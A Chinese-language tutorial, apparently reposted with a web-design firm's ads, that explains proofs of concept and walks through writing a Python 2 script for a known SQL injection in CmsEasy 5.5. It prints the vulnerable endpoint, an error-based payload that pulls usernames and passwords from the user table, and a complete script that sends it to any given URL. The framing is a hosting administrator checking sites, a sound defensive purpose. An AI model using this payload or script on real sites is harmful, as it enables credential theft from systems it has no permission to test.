小編給大家分享一下python中poc指的是什么意思,希望大家閱讀完這篇文章后大所收獲,下面讓我們一起去探討吧!
成都創(chuàng)新互聯公司是專業(yè)的安達網站建設公司,安達接單;提供網站設計、成都網站設計,網頁設計,網站設計,建網站,PHP網站建設等專業(yè)做網站服務;采用PHP框架,可快速的進行安達網站開發(fā)網頁制作和功能擴展;專業(yè)做搜索引擎喜愛的網站,專業(yè)的做網站團隊,希望更多企業(yè)前來合作!
0x00 我們需要掌握的幾個的概念
PoC(全稱:Proof of Concept)中文意思是“觀點證明”。在安全行業(yè)中PoC則是一段驗證漏洞的程序,使我們能夠確認這個漏洞是真實存在的。
Python,是一種面向對象、解釋型計算機程序設計語言。常見的一些庫我們需要了解,比如:urllib,urllib2,re,request,socket等,本文我們要使用Python這門語言,Python的基礎知識我們不做講解。
SQL Injection,通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執(zhí)行惡意的SQL命令。
0x01 PoC編寫流程
場景還原:某網站托管公司,旗下托管了數萬個站點,負責這些站點的安全,但是突然某一天,某知名CMS程序被爆出存在一個高危的SQL注入,某網管排查后發(fā)現旗下托管網站中存在幾百個站點使用該CMS程序,那么一個一個去排查是否存在該漏洞是非常繁瑣的,所以,我們需要一個PoC來驗證下。
·根據該漏洞詳情的描述,假設已知出現漏洞的CMS版本號為4.1,可以去其官網或者GitHub上去下載相對應的版本。
·下載之后,模擬其服務器真實環(huán)境,本地進行搭建。根據漏洞描述,進行復現,已SQL注入為例,重復提交不同的參數,觀察不同的返回結果,同時注意如果該漏洞不存在出現的結果。
·根據漏洞復現的實際情況,進行PoC的編寫。
·PoC寫完之后需要進行相關的測試,已確保該PoC的編寫沒有問題,比如測試靶機程序,以及不存在漏洞的程序。
0x02 SQL Injection poc編寫
已知CmsEasy 5.5 UTF-8程序存在SQL注入,烏云漏洞中的漏洞細節(jié)比較詳細
(由于wooyun已經暫停訪問,故不上鏈接了)。
·首先,我們需要下載其相關源碼,進行本地搭建。
閱讀漏洞細節(jié),我們得知其url與payload如下:
URL:http://xxx.xxx/celive/live/header.php Payload:xajax=LiveMessage&xajaxargs[0]=name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20
·漏洞復現:我們根據其漏洞描述,進行復現,該注入點需要發(fā)起一個Post請求,我們使用Firefox瀏覽器配合hackbar插件進行復現,填入url與payload,發(fā)送,獲取其賬戶密碼。
漏洞效果如下:
這樣,我們的漏洞就已經復現成功了。接下來,我們來寫Poc。
#!/usr/bin/env python # coding:utf-8 import urllib2 import urllib import re import sys def verify(url): target = '%s/celive/live/header.php' % url #需要發(fā)送的數據 post_data = { 'xajax': 'LiveMessage', 'xajaxargs[0]': "name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- " } try: #發(fā)送請求 req = urllib2.Request(target, data=urllib.urlencode(post_data)) response = urllib2.urlopen(req) #處理請求,進行判斷 if response: data = response.read() if "XPATH syntax error" in data: print "%s is vulnerable" % target else: print "%s is not vulnerable" % target except Exception, e: print "Something happend..." print e def main(): args = sys.argv url = "" if len(args) == 2: url = args[1] verify(url) else: print "Usage: python %s url" % (args[0]) if __name__ == '__main__': main()
看完了這篇文章,相信你對python中poc指的是什么意思有了一定的了解,想了解更多相關知識,歡迎關注創(chuàng)新互聯行業(yè)資訊頻道,感謝各位的閱讀!
分享文章:python中poc指的是什么意思
網頁地址:http://bm7419.com/article26/ijhscg.html
成都網站建設公司_創(chuàng)新互聯,為您提供服務器托管、外貿建站、Google、網站制作、標簽優(yōu)化、微信公眾號
聲明:本網站發(fā)布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯